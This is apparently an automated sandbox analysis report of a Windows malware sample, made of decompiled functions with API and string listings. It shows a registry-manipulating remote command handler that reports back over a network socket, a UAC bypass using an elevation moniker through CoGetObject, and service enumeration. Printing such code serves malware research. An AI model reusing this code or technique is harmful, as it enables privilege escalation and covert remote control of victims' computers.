				void* _t184;
				void* _t185;
				long _t188;
				void* _t195;
				void* _t207;
				void* _t209;
				void* _t220;
				void* _t236;
				void* _t250;
				signed int _t327;
				void* _t330;
				void* _t332;
				void* _t337;
				void* _t339;
				void* _t341;
				signed int _t342;
				void* _t344;
				void* _t351;
				signed int _t352;
				void* _t355;
				void* _t356;
				void* _t357;
				void* _t360;
				void* _t365;
				void* _t366;
				void* _t368;
				void* _t369;
				void* _t371;
				void* _t373;
				void* _t374;
				void* _t376;
				void* _t378;
				void* _t380;
				void* _t385;

				_t385 = __eflags;
				_t325 = __edx;
				_push(_t207);
				_t75 = E00401F8B( &_a8);
				_push(0xffffffff);
				_t330 = 4;
				_push(_t330);
				_push( &_v52);
				E00404182( &_a8);
				_t355 = (_t352 & 0xfffffff8) - 0x4c;
				E004020D6(_t207, _t355, __edx, _t385, 0x472ec8);
				_t356 = _t355 - 0x18;
				E004020D6(_t207, _t356, __edx, _t385,  &_v68);
				E0041A976( &_v108, __edx);
				_t357 = _t356 + 0x30;
				_t337 =  *_t75 - 0x35;
				if(_t337 == 0) {
					E00401F66(_t207,  &_v76);
					__eflags = E004021DA( &_v88) - 1;
					if(__eflags > 0) {
						L004086CB(_t207,  &_v80, _t325, E00401F8B(E00401E45( &_v88, _t325, _t351, __eflags, 1)));
					}
					E004020D6(_t207, _t357 - 0x18, _t325, __eflags, E00401E45( &_v88, _t325, _t351, __eflags, 0));
					_t86 = E00401EE4( &_v84);
					_t325 = 1;
					_t220 = _t86;
					L33:
					E00412FF5(_t220, _t325, _t392);
					L34:
					E00401EE9();
					L35:
					E00401E6D( &_v88, _t325);
					E00401FB8();
					E00401FB8();
					return 0;
				}
				_t339 = _t337 - 1;
				if(_t339 == 0) {
					_t97 = E00401F8B(E00401E45( &_v88, __edx, _t351, __eflags, 2));
					_t99 = E00401F8B(E00401E45( &_v92, __edx, _t351, __eflags, 1));
					_t332 = 0;
					_t100 = E00401E45( &_v96, __edx, _t351, __eflags, 0);
					_t360 = _t357 - 0x18;
					E004020D6(_t207, _t360, _t325, __eflags, _t100);
					_t102 = E00412F64(_t207, __eflags, _t97);
					_t325 = _t99;
					_t103 = E00412D0B(_t102, _t99);
					_t362 = _t360 + 0x18 - 0x18;
					_t236 = _t360 + 0x18 - 0x18;
					__eflags = _t103;
					if(__eflags == 0) {
						_push("2");
						L29:
						E00402073(_t207, _t236, _t325, _t351);
						E00404A81(0x473450, _t325, __eflags);
						goto L35;
					}
					_push("1");
					L18:
					E00402073(_t207, _t236, _t325, _t351);
					E00404A81(0x473450, _t325, __eflags);
					E004020D6(_t207, _t362 - 0x18, _t325, __eflags, E00401E45( &_v120, _t325, _t351, __eflags, _t332));
					_t111 = E00401F8B(E00401E45( &_v128, _t325, _t351, __eflags, 1));
					_t325 = 0;
					E00412FF5(_t111, 0, __eflags);
					goto L35;
				}
				_t341 = _t339 - 1;
				if(_t341 == 0) {
					E0040415E(_t207,  &_v80, __edx, _t351, E00401F8B(E00401E45( &_v88, __edx, _t351, __eflags, 1)));
					 *0x470d80 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), "SHDeleteKeyW");
					_t118 = E00401EE4( &_v84);
					_t119 = E00401E45( &_v96, _t325, _t351, __eflags, 0);
					_t365 = _t357 - 0x18;
					E004020D6(_t207, _t365, _t325, __eflags, _t119);
					_t121 = E00412F64(_t207, __eflags, _t118);
					_t366 = _t365 + 0x18;
					__eflags =  *0x470d80(_t121);
					if(__eflags != 0) {
						_t250 = _t366 - 0x18;
						_push("9");
					} else {
						_t125 = E0040245C();
						_t342 = 2;
						_t207 = E00413811( &_v84, "\\", _t125 - _t342);
						__eflags = _t207 - 0xffffffff;
						if(__eflags != 0) {
							_t51 = _t207 + 1; // 0x1
							_t130 = E004330A3( ~0x00BADBAD | _t51 * _t342, _t51 * _t342 >> 0x20, _t342, __eflags);
							E0043E0D9(_t130, E00401EE4(E00408682( &_v84,  &_v36, 0, _t207)));
							E00401EE9();
							_t136 = E00401E45( &_v108, _t51 * _t342 >> 0x20, _t351, __eflags, 0);
							_t368 = _t366 - 0x18;
							E004020D6(_t207, _t368, _t51 * _t342 >> 0x20, __eflags, _t136);
							_t325 = 0;
							__eflags = 0;
							E00412FF5(_t130, 0, 0,  ~0x00BADBAD | _t51 * _t342);
							E004330AC(_t130);
							_t369 = _t368 + 0x1c;
						} else {
							_t140 = E00401E45( &_v96, _t325, _t351, __eflags, 0);
							_t371 = _t366 - 0x18;
							E004020D6(_t207, _t371, _t325, __eflags, _t140);
							_t325 = 0;
							E00412FF5(0, 0, __eflags);
							_t369 = _t371 + 0x18;
						}
						_t250 = _t369 - 0x18;
						_push("8");
					}
					L10:
					E00402073(_t207, _t250, _t325, _t351);
					E00404A81(0x473450, _t325, __eflags);
					goto L34;
				}
				_t344 = _t341 - 1;
				if(_t344 == 0) {
					_t145 = E0043A3AC(_t143, E00401F8B(E00401E45( &_v88, __edx, _t351, __eflags, 3)));
					__eflags = _t145 - _t330;
					if(__eflags == 0) {
						E004351E0( &_v108, E00401F8B(E00401E45( &_v92, __edx, _t351, __eflags, _t330)), _t330);
						_push(_v108);
						_t151 = E00401F8B(E00401E45( &_v92, _t325, _t351, __eflags, 2));
						_t153 = E00401F8B(E00401E45( &_v96, _t325, _t351, __eflags, 1));
						_t332 = 0;
						__eflags = 0;
						_t154 = E00401E45( &_v100, _t325, _t351, 0, 0);
						_t373 = _t357 + 0xc - 0x18;
						E004020D6(_t207, _t373, _t325, __eflags, _t154);
						_t156 = E00412F64(_t207, __eflags, _t151);
						_t374 = _t373 + 0x18;
						_t325 = _t153;
						_t157 = E00412BA7(_t156, _t153);
					} else {
						__eflags = _t145 - 0xb;
						if(__eflags == 0) {
							E004351E0( &_v104, E00401F8B(E00401E45( &_v92, __edx, _t351, __eflags, _t330)), 8);
							_t163 = E00401F8B(E00401E45( &_v92, _t325, _t351, __eflags, 2));
							_t165 = E00401F8B(E00401E45( &_v96, _t325, _t351, __eflags, 1));
							_t332 = 0;
							_t166 = E00401E45( &_v100, _t325, _t351, __eflags, 0);
							_t376 = _t357 + 0xc - 0x18;
							E004020D6(_t207, _t376, _t325, __eflags, _t166);
							_t168 = E00412F64(_t207, __eflags, _t163);
							_t325 = _t165;
							_t157 = E00412BEB(_t168, _t165, _v104, _v100);
							_t374 = _t376 + 0x24;
						} else {
							_push(_t145);
							E00401E45( &_v92, __edx, _t351, __eflags, _t330);
							_push(E0040245C());
							_push(E00401F8B(E00401E45( &_v92, __edx, _t351, __eflags, _t330)));
							_t174 = E00401F8B(E00401E45( &_v96, _t325, _t351, __eflags, 2));
							_t176 = E00401F8B(E00401E45( &_v100, _t325, _t351, __eflags, 1));
							_t332 = 0;
							_t177 = E00401E45( &_v104, _t325, _t351, __eflags, 0);
							_t378 = _t357 - 0x18;
							E004020D6(_t207, _t378, _t325, __eflags, _t177);
							_t179 = E00412F64(_t207, __eflags, _t174);
							_t325 = _t176;
							_t157 = E00412AB8(_t179, _t176);
							_t374 = _t378 + 0x28;
						}
					}
					_t362 = _t374 - 0x18;
					_t236 = _t374 - 0x18;
					__eflags = _t157;
					if(__eflags == 0) {
						_push("5");
						goto L29;
					} else {
						_push("4");
						goto L18;
					}
				}
				_t390 = _t344 != 1;
				if(_t344 != 1) {
					goto L35;
				}
				E0040415E(_t207,  &_v80, __edx, _t351, E00401F8B(E00401E45( &_v88, __edx, _t351, _t390, 1)));
				_t184 = E00401EE4( &_v84);
				_t185 = E00401E45( &_v96, __edx, _t351, _t390, 0);
				_t380 = _t357 - 0x18;
				E004020D6(_t207, _t380, _t325, _t390, _t185);
				_t188 = RegCreateKeyExW(E00412F64(_t207, _t390, _t184), 0, 0, 0, 0x20006, 0,  &_v112, 0, ??);
				_t349 = _t188;
				RegCloseKey(_v120);
				_t382 = _t380 + 0x18 - 0x18;
				_t250 = _t380 + 0x18 - 0x18;
				_t391 = _t188;
				if(_t188 != 0) {
					_push("7");
					goto L10;
				}
				E00402073(_t207, _t250, _t325, _t351, "6");
				_push(0x72);
				E00404A81(0x473450, _t325, _t391);
				_t209 = E0040869C( &_v108, 0x473450, 0x473450);
				_t392 = _t209 - 0xffffffff;
				if(_t209 != 0xffffffff) {
					_t14 = _t209 + 1; // 0x1
					_t327 = 2;
					_t195 = E004330A3( ~(__eflags > 0) | _t14 * _t327, _t14 * _t327 >> 0x20, _t349, __eflags);
					E0043E0D9(_t195, E00401EE4(E00408682( &_v96,  &_v48, 0, _t209)));
					E00401EE9();
					E004020D6(_t209, _t382 - 0x18, _t14 * _t327 >> 0x20, __eflags, E00401E45( &_v120, _t14 * _t327 >> 0x20, _t351, __eflags, 0));
					_t325 = 0;
					E00412FF5(_t195, 0, __eflags,  ~(__eflags > 0) | _t14 * _t327);
					E004330AC(_t195);
					goto L34;
				} else {
					E004020D6(_t209, _t382 - 0x18, _t325, _t392, E00401E45( &_v108, _t325, _t351, _t392, 0));
					_t325 = 0;
					_t220 = 0;
					goto L33;
				}
			}






















































































                0x004131da
                0x004131da
                0x004131e6
                0x004131e9
                0x004131ee
                0x004131f2
                0x004131f8
                0x004131fd
                0x004131fe
                0x00413203
                0x0041320d
                0x00413212
                0x0041321c
                0x00413225
                0x0041322a
                0x0041322d
                0x00413230
                0x00413746
                0x00413754
                0x00413757
                0x00413770
                0x00413770
                0x00413786
                0x0041378f
                0x00413794
                0x00413796
                0x00413798
                0x00413798
                0x004137a0
                0x004137a4
                0x004137a9
                0x004137ad
                0x004137b6
                0x004137be
                0x004137cb
                0x004137cb
                0x00413236
                0x00413239
                0x004136d4
                0x004136e7
                0x004136ec
                0x004136f5
                0x004136fa
                0x00413700
                0x00413705
                0x0041370d
                0x00413711
                0x00413717
                0x0041371a
                0x0041371c
                0x0041371e
                0x0041372a
                0x0041372f
                0x0041372f
                0x0041373b
                0x00000000
                0x0041373b
                0x00413720
                0x00413538
                0x00413538
                0x00413544
                0x00413559
                0x0041356b
                0x00413570
                0x00413574
                0x00000000
                0x00413579
                0x0041323f
                0x00413242
                0x004135a2
                0x004135c2
                0x004135c7
                0x004135d4
                0x004135d9
                0x004135df
                0x004135e4
                0x004135e9
                0x004135f3
                0x004135f5
                0x004136bb
                0x004136bd
                0x004135fb
                0x004135ff
                0x00413606
                0x00413618
                0x0041361a
                0x0041361d
                0x00413644
                0x00413651
                0x00413672
                0x0041367d
                0x00413687
                0x0041368c
                0x00413692
                0x00413697
                0x00413697
                0x0041369b
                0x004136a1
                0x004136a6
                0x0041361f
                0x00413624
                0x00413629
                0x0041362f
                0x00413634
                0x00413638
                0x0041363d
                0x0041363d
                0x004136ac
                0x004136ae
                0x004136ae
                0x00413388
                0x00413388
                0x00413394
                0x00000000
                0x00413394
                0x00413248
                0x0041324b
                0x004133b1
                0x004133bb
                0x004133bd
                0x004134cd
                0x004134d9
                0x004134e6
                0x004134f9
                0x004134fe
                0x004134fe
                0x00413507
                0x0041350c
                0x00413512
                0x00413517
                0x0041351c
                0x0041351f
                0x00413523
                0x004133c3
                0x004133c3
                0x004133c6
                0x00413455
                0x00413472
                0x00413485
                0x0041348a
                0x00413493
                0x00413498
                0x0041349e
                0x004134a3
                0x004134ab
                0x004134af
                0x004134b4
                0x004133c8
                0x004133c8
                0x004133ca
                0x004133d6
                0x004133e8
                0x004133f6
                0x00413409
                0x0041340e
                0x00413417
                0x0041341c
                0x00413422
                0x00413427
                0x0041342f
                0x00413433
                0x00413438
                0x00413438
                0x004133c6
                0x0041352a
                0x0041352d
                0x0041352f
                0x00413531
                0x00413581
                0x00000000
                0x00413533
                0x00413533
                0x00000000
                0x00413533
                0x00413531
                0x00413251
                0x00413254
                0x00000000
                0x00000000
                0x00413271
                0x0041328b
                0x00413296
                0x0041329b
                0x004132a1
                0x004132af
                0x004132b9
                0x004132bb
                0x004132c1
                0x004132c4
                0x004132c6
                0x004132c8
                0x00413383
                0x00000000
                0x00413383
                0x004132d3
                0x004132d8
                0x004132df
                0x004132ef
                0x004132f1
                0x004132f4
                0x00413316
                0x0041331b
                0x00413326
                0x00413347
                0x00413352
                0x00413367
                0x0041336c
                0x00413370
                0x00413376
                0x00000000
                0x004132f6
                0x00413306
                0x0041330b
                0x0041330d
                0x00000000
                0x0041330d

                APIs
                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004132AF
                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004132BB
                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004135B1
                • GetProcAddress.KERNEL32(00000000), ref: 004135B8
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: AddressCloseCreateLibraryLoadProcsend
                • String ID: P4G$P4G$P4G$P4G$SHDeleteKeyW$Shlwapi.dll
                • API String ID: 2127411465-531188865
                • Opcode ID: 75e3aaf9eb3c0f46d7df2fdcc2099b2be679f92e198cfa9533ad35c7f1b345ea
                • Instruction ID: ee582708a1ecfa71abd053f628b5a3b7b6646190f40a2f0f90fdaba40559649c
                • Opcode Fuzzy Hash: 75e3aaf9eb3c0f46d7df2fdcc2099b2be679f92e198cfa9533ad35c7f1b345ea
                • Instruction Fuzzy Hash: 07E1FD72A0430067C614BB76DC579AE32A99F95718F40063FF906B71E2ED7D8B44829F
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406B71 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                Download Yara Rule
                C-Code - Quality: 15%
                			E00406B71(void* __edx, void* __eflags, signed int* _a8) {
				signed int _v8;
				intOrPtr _v24;
				char _v44;
				char _v564;
				void* _t14;
				char* _t25;
				char* _t34;

				_push("[+] ucmAllocateElevatedObject\n");
				E00406874(__eflags);
				_v8 = _v8 & 0x00000000;
				_t33 = L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}";
				_t34 = 0x80004005;
				_t14 = E0043A3D6(L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}");
				_t38 = _t14 - 0x40;
				if(_t14 <= 0x40) {
					E00406804();
					_v44 = 0x24;
					_v24 = 4;
					E0043E0D9( &_v564, L"Elevation:Administrator!new:");
					E0043E0FB( &_v564, _t33);
					E00406874(_t38);
					_t25 =  &_v564;
					__imp__CoGetObject(_t25,  &_v44, 0x4644e0,  &_v8, "[+] CoGetObject\n");
					_t34 = _t25;
					_t39 = _t34;
					if(_t34 == 0) {
						_push("[+] CoGetObject SUCCESS\n");
					} else {
						_push("[-] CoGetObject FAILURE\n");
					}
					E00406874(_t39);
				}
				 *_a8 = _v8;
				return _t34;
			}










                0x00406b7c
                0x00406b81
                0x00406b86
                0x00406b8a
                0x00406b90
                0x00406b95
                0x00406b9c
                0x00406b9f
                0x00406ba4
                0x00406baf
                0x00406bbc
                0x00406bc3
                0x00406bd0
                0x00406bda
                0x00406bef
                0x00406bf6
                0x00406bfc
                0x00406bfe
                0x00406c00
                0x00406c09
                0x00406c02
                0x00406c02
                0x00406c02
                0x00406c0e
                0x00406c13
                0x00406c1b
                0x00406c23

                APIs
                • _wcslen.LIBCMT ref: 00406B95
                • CoGetObject.OLE32(?,00000024,004644E0,00000000), ref: 00406BF6
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Object_wcslen
                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                • API String ID: 240030777-3166923314
                • Opcode ID: 37b0210f552b79fdcc0f43efa47c6e279d7bbc4e5013fe63c4ecb2df5bec6842
                • Instruction ID: 6bce67489c7e09321c684eae8049871ec0f9a08aead341868aa49f1d7bf40555
                • Opcode Fuzzy Hash: 37b0210f552b79fdcc0f43efa47c6e279d7bbc4e5013fe63c4ecb2df5bec6842
                • Instruction Fuzzy Hash: 91110A72901218A6DB10F7D5C845F8E77BCDB44714F11006BF905B2280EB7CCA54867E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004192A3 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                Download Yara Rule
                C-Code - Quality: 95%
                			E004192A3(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t100;
				void* _t107;
				int _t108;
				long _t110;
				void* _t133;
				void* _t194;
				short** _t195;
				int _t196;
				struct _ENUM_SERVICE_STATUS* _t197;
				int _t198;
				struct _QUERY_SERVICE_CONFIG* _t201;
				void* _t202;

				_t185 = __edx;
				_t200 = 0;
				_t194 = __ecx;
				 *((intOrPtr*)(_t202 + 0x3c)) = __ecx;
				_t133 = OpenSCManagerA(0, 0, 4);
				if(_t133 != 0) {
					_t135 = _t202 + 0x4c;
					E00401F66(_t133, _t202 + 0x4c);
					 *(_t202 + 0x18) = 0;
					 *(_t202 + 0x18) = 0;
					 *(_t202 + 0x28) = 0;
					__eflags = EnumServicesStatusW(_t133, 0x3b, 3, _t202 + 0xa4, 0, _t202 + 0x20, _t202 + 0x18, _t202 + 0x20);
					if(__eflags != 0) {
						L12:
						CloseServiceHandle(_t133);
						E00403242(_t133, _t194, _t200, __eflags, _t202 + 0x4c);
						E00401EE9();
						L13:
						return _t194;
					}
					__eflags = GetLastError() - 0xea;
					if(__eflags != 0) {
						goto L12;
					}
					_t196 =  *(_t202 + 0x18);
					_push(_t196);
					_t200 = E0043A620(_t135);
					 *(_t202 + 0x30) = _t200;
					EnumServicesStatusW(_t133, 0x3b, 3, _t200, _t196, _t202 + 0x20, _t202 + 0x18, _t202 + 0x20);
					_t197 = 0;
					 *(_t202 + 0x28) = 0;
					__eflags =  *(_t202 + 0x14);
					if(__eflags <= 0) {
						L11:
						L0043A61B(_t200);
						goto L12;
					}
					_t195 = _t200;
					_t201 =  *(_t202 + 0x2c);
					do {
						E0040323D(E004042DC(_t133, _t202 + 0x64, _t195[1], _t201, __eflags, E0040415E(_t133, _t202 + 0x38, _t185, _t201, "\t")));
						E00401EE9();
						E00401EE9();
						E0040323D(E004042DC(_t133, _t202 + 0x34,  *_t195, _t201, __eflags, E0040415E(_t133, _t202 + 0x68, _t195[1], _t201, "\t")));
						E00401EE9();
						E00401EE9();
						_t100 = E0040415E(_t133, _t202 + 0x80,  *_t195, _t201, "\t");
						_t185 = E0041A762(_t133, _t202 + 0x64, _t195[3]);
						E0040323D(E00402F85(_t202 + 0x38, _t101, _t100));
						E00401EE9();
						E00401EE9();
						E00401EE9();
						 *(_t202 + 0x1c) =  *(_t202 + 0x1c) & 0x00000000;
						_t107 = OpenServiceW(_t133,  *_t195, 1);
						_t160 = _t202 + 0x1c;
						 *(_t202 + 0x24) = _t107;
						_t108 = QueryServiceConfigW(_t107, _t201, 0, _t202 + 0x1c);
						__eflags = _t108;
						if(_t108 == 0) {
							_t110 = GetLastError();
							__eflags = _t110 - 0x7a;
							if(_t110 == 0x7a) {
								_t198 =  *(_t202 + 0x1c);
								_push(_t198);
								_t201 = E0043A620(_t160);
								QueryServiceConfigW( *(_t202 + 0x30), _t201, _t198, _t202 + 0x1c);
								_t199 = "\t";
								E0040323D(E00402FF4(_t133, _t202 + 0x80, E0041A762(_t133, _t202 + 0x34,  *_t201), _t195, _t201, __eflags, "\t"));
								E00401EE9();
								E00401EE9();
								E0040323D(E00402FF4(_t133, _t202 + 0x80, E0041A762(_t133, _t202 + 0x34,  *((intOrPtr*)(_t201 + 4))), _t195, _t201, __eflags, "\t"));
								E00401EE9();
								E00401EE9();
								_t185 = E004042DC(_t133, _t202 + 0x38,  *((intOrPtr*)(_t201 + 0xc)), _t201, __eflags, E0040415E(_t133, _t202 + 0x6c, _t119, _t201, _t199));
								E0040323D(E00402FF4(_t133, _t202 + 0x80, _t125, _t195, _t201, __eflags, "\n"));
								E00401EE9();
								E00401EE9();
								E00401EE9();
								L0043A61B(_t201);
								_t197 =  *(_t202 + 0x2c);
							}
						}
						CloseServiceHandle( *(_t202 + 0x24));
						_t197 = _t197 + 1;
						_t195 =  &(_t195[9]);
						 *(_t202 + 0x28) = _t197;
						__eflags = _t197 -  *(_t202 + 0x14);
					} while (__eflags < 0);
					_t194 =  *(_t202 + 0x30);
					_t200 =  *(_t202 + 0x2c);
					goto L11;
				}
				E0040415E(_t133, _t194, _t185, 0, 0x46a8f0);
				goto L13;
			}


















                0x004192a3
                0x004192af
                0x004192b1
                0x004192b5
                0x004192bf
                0x004192c3
                0x004192d6
                0x004192da
                0x004192e3
                0x004192ec
                0x004192f5
                0x0041930e
                0x00419310
                0x0041957c
                0x0041957d
                0x0041958a
                0x00419593
                0x00419598
                0x004195a4
                0x004195a4
                0x0041931c
                0x00419321
                0x00000000
                0x00000000
                0x00419327
                0x0041932b
                0x00419332
                0x0041933d
                0x0041934e
                0x00419354
                0x00419356
                0x0041935a
                0x0041935e
                0x00419575
                0x00419576
                0x00000000
                0x0041957b
                0x00419364
                0x00419366
                0x0041936a
                0x0041938b
                0x00419394
                0x0041939d
                0x004193c2
                0x004193cb
                0x004193d4
                0x004193e5
                0x004193f7
                0x00419408
                0x00419411
                0x0041941a
                0x00419423
                0x00419428
                0x00419432
                0x00419438
                0x0041943c
                0x00419445
                0x0041944b
                0x0041944d
                0x00419453
                0x00419459
                0x0041945c
                0x00419462
                0x00419466
                0x0041946d
                0x0041947a
                0x00419487
                0x004194a6
                0x004194af
                0x004194b8
                0x004194de
                0x004194e7
                0x004194f0
                0x00419512
                0x00419526
                0x0041952f
                0x00419538
                0x00419541
                0x00419547
                0x0041954c
                0x00419550
                0x0041945c
                0x00419555
                0x0041955b
                0x0041955c
                0x0041955f
                0x00419563
                0x00419563
                0x0041956d
                0x00419571
                0x00000000
                0x00419571
                0x004192cc
                0x00000000

                APIs
                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00473838), ref: 004192B9
                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419308
                • GetLastError.KERNEL32 ref: 00419316
                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041934E
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                • String ID:
                • API String ID: 3587775597-0
                • Opcode ID: 85ca114e2818de7ccd32f15da29a077d45459a29e699abf73d51743d0292195a
                • Instruction ID: dba20098d3e66f28599fd06314c57e2e3311d68971aa7dbf5ba53787a6468409
                • Opcode Fuzzy Hash: 85ca114e2818de7ccd32f15da29a077d45459a29e699abf73d51743d0292195a
                • Instruction Fuzzy Hash: 79816371508301ABC304EB61D8959AFB7E8FF94708F50082EF596521D2EF74EA49CB9A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00450E90 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 89%
                			E00450E90(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, short* _a8, char _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed int* _v24;
				short* _v28;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed int* _t46;
				signed int _t47;
				short* _t48;
				int _t49;
				short* _t56;
				short* _t57;
				short* _t58;
				int _t66;
				int _t68;
				short* _t72;
				intOrPtr _t75;
				void* _t77;
				short* _t78;
				intOrPtr _t85;
				short* _t89;
				short* _t92;
				void* _t94;
				short** _t102;
				short* _t103;
				signed int _t105;
				signed short _t108;
				signed int _t109;
				void* _t110;

				_t39 =  *0x46f00c; // 0xd60a1515
				_v8 = _t39 ^ _t109;
				_t3 =  &_a12; // 0x44336d
				_t89 =  *_t3;
				_t105 = _a4;
				_v28 = _a8;
				_v24 = E00446A95(_t89, __ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E00446A95(_t89, __ecx, __edx);
				_t8 =  &_v20; // 0x44336d
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) = _t8;
				_t92 = _t105 + 0x80;
				_t46 = _v24;
				 *_t46 = _t105;
				_t102 =  &(_t46[1]);
				 *_t102 = _t92;
				if(_t92 != 0 &&  *_t92 != 0) {
					_t85 =  *0x45e314; // 0x17
					E00450E33(0, 0x45e200, _t85 - 1, _t102);
					_t46 = _v24;
					_t110 = _t110 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if( *_t48 == _t99) {
						goto L19;
					}
					_t21 =  &_v20; // 0x44336d
					E004507D0(_t92, _t99, _t21);
					_pop(_t92);
					goto L20;
				} else {
					_t72 =  *_t102;
					if(_t72 == 0 ||  *_t72 == _t99) {
						_t16 =  &_v20; // 0x44336d
						E004508B6(_t92, _t99, _t16);
					} else {
						_t15 =  &_v20; // 0x44336d
						E0045081B(_t92, _t99, _t15);
					}
					_pop(_t92);
					if(_v20 != 0) {
						_t103 = 0;
						__eflags = 0;
						goto L25;
					} else {
						_t75 =  *0x45e1fc; // 0x41
						_t77 = E00450E33(_t99, 0x45def0, _t75 - 1, _v24);
						_t110 = _t110 + 0xc;
						if(_t77 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t108 = E00450CBC(_t92,  ~_t105 & _t105 + 0x00000100,  &_v20);
								_pop(_t94);
								__eflags = _t108;
								if(_t108 == 0) {
									goto L22;
								}
								__eflags = _t108 - 0xfde8;
								if(_t108 == 0xfde8) {
									goto L22;
								}
								__eflags = _t108 - 0xfde9;
								if(_t108 == 0xfde9) {
									goto L22;
								}
								_t56 = IsValidCodePage(_t108 & 0x0000ffff);
								__eflags = _t56;
								if(_t56 == 0) {
									goto L22;
								}
								_t57 = IsValidLocale(_v16, 1);
								__eflags = _t57;
								if(_t57 == 0) {
									goto L22;
								}
								_t58 = _v28;
								__eflags = _t58;
								if(__eflags != 0) {
									 *_t58 = _t108;
								}
								E004473C9(_t89, _t94, _t99, _t103, _t108, __eflags, _v16,  &(_v24[0x94]), 0x55, _t103);
								__eflags = _t89;
								if(__eflags == 0) {
									L36:
									L23:
									return E004338BB(_v8 ^ _t109);
								}
								E004473C9(_t89, _t94, _t99, _t103, _t108, __eflags, _v16,  &(_t89[0x90]), 0x55, _t103);
								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
								__eflags = _t66;
								if(_t66 == 0) {
									goto L22;
								}
								_t68 = GetLocaleInfoW(_v12, 0x1002,  &(_t89[0x40]), 0x40);
								__eflags = _t68;
								if(_t68 == 0) {
									goto L22;
								}
								E004407BF( &(_t89[0x80]), _t108,  &(_t89[0x80]), 0x10, 0xa);
								goto L36;
							}
							L22:
							goto L23;
						}
						_t78 =  *_t102;
						_t103 = 0;
						if(_t78 == 0 ||  *_t78 == 0) {
							E004508B6(_t92, _t99,  &_v20);
						} else {
							E0045081B(_t92, _t99,  &_v20);
						}
						_pop(_t92);
						goto L21;
					}
				}
			}



































                0x00450e98
                0x00450e9f
                0x00450ea6
                0x00450ea6
                0x00450eaa
                0x00450eae
                0x00450ebc
                0x00450ec1
                0x00450ec2
                0x00450ec3
                0x00450ec4
                0x00450ec9
                0x00450ecc
                0x00450ece
                0x00450ed4
                0x00450eda
                0x00450edd
                0x00450edf
                0x00450ee2
                0x00450ee6
                0x00450eed
                0x00450efa
                0x00450eff
                0x00450f02
                0x00450f05
                0x00450f05
                0x00450f07
                0x00450f0a
                0x00450f0e
                0x00450f7e
                0x00450f80
                0x00450f82
                0x00450f95
                0x00450f95
                0x00450f9c
                0x00450fa2
                0x00450fa5
                0x00000000
                0x00450fa5
                0x00450f84
                0x00450f87
                0x00000000
                0x00000000
                0x00450f89
                0x00450f8d
                0x00450f92
                0x00000000
                0x00450f15
                0x00450f15
                0x00450f19
                0x00450f2b
                0x00450f2f
                0x00450f20
                0x00450f20
                0x00450f24
                0x00450f24
                0x00450f38
                0x00450f39
                0x00450fc3
                0x00450fc3
                0x00000000
                0x00450f3f
                0x00450f3f
                0x00450f4e
                0x00450f53
                0x00450f58
                0x00450fa8
                0x00450fa8
                0x00450fa8
                0x00450faa
                0x00450fae
                0x00450fc5
                0x00450fd1
                0x00450fdb
                0x00450fde
                0x00450fdf
                0x00450fe1
                0x00000000
                0x00000000
                0x00450fe3
                0x00450fe9
                0x00000000
                0x00000000
                0x00450feb
                0x00450ff1
                0x00000000
                0x00000000
                0x00450ff7
                0x00450ffd
                0x00450fff
                0x00000000
                0x00000000
                0x00451006
                0x0045100c
                0x0045100e
                0x00000000
                0x00000000
                0x00451010
                0x00451013
                0x00451015
                0x00451017
